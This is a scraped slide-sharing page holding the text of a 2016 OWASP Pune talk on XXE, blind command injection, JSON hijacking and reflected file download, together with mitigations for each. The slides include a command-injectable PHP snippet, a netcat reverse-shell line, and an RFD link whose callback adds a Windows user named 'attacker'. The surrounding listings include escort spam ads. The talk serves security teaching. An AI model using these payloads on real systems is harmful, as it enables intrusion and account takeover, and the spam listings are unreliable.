Selenium 4 - What's coming our way - v1.0.pptx
Selenium 4 - What's coming our way - v1.0.pptxSelenium 4 - What's coming our way - v1.0.pptx
Selenium 4 - What's coming our way - v1.0.pptx
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
Static Code Analysis PHP[tek] 2023
Static Code Analysis PHP[tek] 2023Static Code Analysis PHP[tek] 2023
Static Code Analysis PHP[tek] 2023
 
BSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingBSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated Testing
 
Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox Addons
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
Sa
SaSa
Sa
 
Hadoop: Code Injection, Distributed Fault Injection
Hadoop: Code Injection, Distributed Fault InjectionHadoop: Code Injection, Distributed Fault Injection
Hadoop: Code Injection, Distributed Fault Injection
 
Web Bugs
Web BugsWeb Bugs
Web Bugs
 
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware AnalysisReversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
 
Take control. write a plugin. part II
Take control. write a plugin. part IITake control. write a plugin. part II
Take control. write a plugin. part II
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF Session
 
Real-World WebAppSec Flaws - Examples and Countermeasues
Real-World WebAppSec Flaws - Examples and CountermeasuesReal-World WebAppSec Flaws - Examples and Countermeasues
Real-World WebAppSec Flaws - Examples and Countermeasues
 
Php manish
Php manishPhp manish
Php manish
 

Recently uploaded

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 

Recently uploaded (20)

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 

OWASP Pune Chapter : Dive Into The Profound Web Attacks

  • 1. Narendra Bhati - Security Analyst narendra.bhati@outlook.com Dive Into The Profound Web Attacks OWASP Pune Chapter – 18th Feb 2016
  • 2. Speaker: Narendra Bhati Security Analyst @Suma Soft Pvt. Ltd. – Pune Researcher & Part Time Bug Bounty Hunter Listed in HOF for reporting security Vulnerabilities like Facebook, Google, Mozilla, Twitter etc. Hold more then 12 CVE & 3 Zero days vulnerabilities. Blog – http://websecgeeks.com “Who Am I  - r00tsh3ll”
  • 3. If you have any questions or query regarding the talk, Kindly note it down. So we can discuss it at the end. 3
  • 4. Dive Into The Profound Web Attacks • XXE ( XML External Entity Injection) • Blind RCE ( Blind Remote/OS Command Execution ) • JSON Response Hijacking • Reflected File Download
  • 5. • XXE ( XML External Entity Injection) 5
  • 6. • XXE ( XML External Entity Injection) According To OWASP An XML External Entity attack is a type of an injection attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data 6
  • 7. • XXE ( XML External Entity Injection) Why XXE Take Place ? Failure to validate External XML Entity which gives an attacker the accessing internal resources/data 7
  • 8. • XXE ( XML External Entity Injection) Lets Have A Demo !  8
  • 9. • XXE ( XML External Entity Injection) Getting connection from target domain 9 Accessing internal directories. Doing brute forcing or anything we found a directory in localhost called “/betatesting/testing.php” which is a network utility. Invalid directory. Response with failed to load external entity. Valid directory. Response without failed to load external entity or some kind of difference in valid and invalid directory response..
  • 10. • XXE ( XML External Entity Injection) 10 I am leaving the rest of the process, As per the “testing.php” response. We added a get parameter called “ping” and see we were to able to execute commands. This is a scenario, Where target system have some beta testing application which is under development or etc. You should figured out what you can do with XXE or any other vulnerability
  • 11. • XXE ( XML External Entity Injection) Fixing The XXE Disable XML parser in order to prevent XXE For PHP : bool libxml_disable_entity_loader ([ bool $disable = true ] ) For .Net: settings.XmlResolver = null; Look for the other languages as well. 11
  • 12. • XXE ( XML External Entity Injection) Fixing The XXE Disable XML parser in order to prevent XXE For PHP : bool libxml_disable_entity_loader ([ bool $disable = true ] ) For .Net: settings.XmlResolver = null; Look for the other languages as well. 12
  • 13. • XXE ( XML External Entity Injection) Fixing The XXE Disable XML parser in order to prevent XXE For PHP : bool libxml_disable_entity_loader ([ bool $disable = true ] ) For .Net: settings.XmlResolver = null; Look for the other languages as well. 13
  • 14. Blind RCE ( Blind Remote/OS Command Execution ) 14
  • 15. Blind RCE ( Blind Remote/OS Command Execution ) According To Nature/Behaviour  Similar or Elder Brother Of Blind SQL Injection vulnerability. Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application According To OWASP 15
  • 16. Blind RCE ( Blind Remote/OS Command Execution ) Why RCE Take Place ? Missing/Lack of sanitization of user input, which will append at system shell while execution. 16
  • 17. Blind RCE ( Blind Remote/OS Command Execution ) Ex. Vulnerable Code As PHP <?php print("Please specify the name of the file to delete"); print("<p>"); $file=$_GET['filename']; system("rm $file"); ?> Injection Point 17
  • 18. Blind RCE ( Blind Remote/OS Command Execution ) Some Basic About Using Double Commands • A; B = Run A and then B, no matter success execution of A • A || B = Run B if A failed, No matter if B got failed, A will still run • A && B = Run B if A works, If A Failed B will not execute • A & B = Run B and then run A in background, If A failed B will still get executed • A | B = Run A and pass the output of A to B • A %0a B (Use full for web app) • $(nc –nv ip port –e /bin/bash) 18
  • 19. Blind RCE ( Blind Remote/OS Command Execution ) Demo Time Normal RCE | Some Bypasses | Blind RCE [Low-Medium] 19
  • 20. Blind RCE ( Blind Remote/OS Command Execution ) Detection On Time Delay Response 20 Response comes in 4 Sec Aprox. Response comes in 11 Sec Aprox.
  • 21. Blind RCE ( Blind Remote/OS Command Execution ) 21 In demonstration, We are assuming that target server is configured in such a way that he will not send reverse connection using netcat -e option and we cant use wget also. Response from command “id” getting logged in our python simple http server Lets see are we able to access the /var/tmp folder.Yes we are because in python server we got the response as /var/tmp Using similar kind of aproach, We can interact with shell response. Remember we are not using netcat –e option for the response, But we are just piping the output to another machine
  • 22. Blind RCE ( Blind Remote/OS Command Execution ) Fixing The Command Execution • The developer should scrub all input for malicious characters. • It is much easier to define the legal characters than the illegal characters. 22
  • 24. JSON Response Hijacking Similar to CSRF, This vulnerability basically based on Browsers Bug which allow an attacker to steal sensitive JSON response from victim authenticated session or there could be more interesting thing. According To Sources 24
  • 25. JSON Response Hijacking JSON Hijacking Happened If Source - http://haacked.com/archive/2009/06/25/json-hijacking.aspx/ • returns sensitive data. • returns a JSON array. [ content type-json] • responds to GET requests. • the browser making the request has JavaScript enabled (the browser making the request supports the __defineSetter__ method. 25
  • 26. JSON Response Hijacking Lets Dive Into The Demo 26
  • 27. JSON Response Hijacking Fixing JSON Hijacking Source - http://haacked.com/archive/2009/06/25/json-hijacking.aspx/ • Only return JSON objects to POST requests. • Prevent the web browser from interpreting the JSON object as valid JavaScript code. • Implement CSRF protection random tokens for all JSON requests. 27
  • 29. Reflected File Download According To Sources 29 RFD is a web attack vector that enables attackers to gain complete control over a victims machine by virtually downloading a file from a trusted domain. Recently found in Facebook & Google Etc by researchers. Source- https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
  • 30. Reflected File Download Reflected: There should be reflection of the value given in the URL as response Filename: File name should allowing or characterized by great or excessive freedom of behavior which should also accept additional user control values and file type. Like application can accept filename between first slash “/” and “?” character. Ex. Code (PHP) (Will Not Work) Lets Separate Those Words 30
  • 31. Reflected File Download Download : https://anyvulnerablewebsite.com/json;/maliciousfile.bat/.exe?download=anycomm and “malicious.bat/,exe“ So basically this is browser behavior that how he will handle the download process, Mention behavior is for chrome Expect other browsers. Other brewers may have different behavior for the same. Lets Separate Those Words 31
  • 32. Reflected File Download 1. Attacker send a malicious URL to victim of trusted domain. Ex. http://anytrustedsite.com/apitest/search;setup.bat?term=f00b ar&callback=net user attacker attacker 2. Victim found the domain is trusted. So he will access the URL. 3. After clicking on the URL, The file will be downloaded and after executing that file, Some interesting thing will happened. ;) Attack Scenario 32
  • 34. Reflected File Download As you can can see we having a web application. The value of download parameter is getting back in response without file name header. And the response is downloadable 34
  • 35. Reflected File Download Now we are going to enter a file name in url, Because the response header don’t have the file name header. So we have chance that we can control the file name from URL it self. 35
  • 36. Reflected File Download Now can craft a payload as input which will execute some system command on victim machine. As per the reflection we can separate out the rest of the value to perform a command execution 36
  • 37. Reflected File Download After executing that file we have calc execution. 37
  • 38. Reflected File Download Create some interesting payload. Before doing lets check out user accounts. 38
  • 39. Reflected File Download After executing the downloaded file, We have an another user account called “attacker” 39
  • 40. Reflected File Download Add - Content-Disposition: attachment; filename=anyfile.pdf/txt Don’t allow the application to take permissive input. Limit the callback function for “;:/” characters. Fixing The Reflected File Download 40
  • 42. Thanks, For listening peacefully  Kindly send me your feedback regarding the talk on – narendra.bhati@outlook.com It will help me to improve the presentation next time. 42

Editor's Notes

  1. Normal RCE On DVWA Filtered RCE On Custom App Blind RCE On Custom & BWAPP App
  2. Normal RCE On DVWA Filtered RCE On Custom App Blind RCE On Custom & BWAPP App
  3. Normal RCE On DVWA Filtered RCE On Custom App Blind RCE On Custom & BWAPP App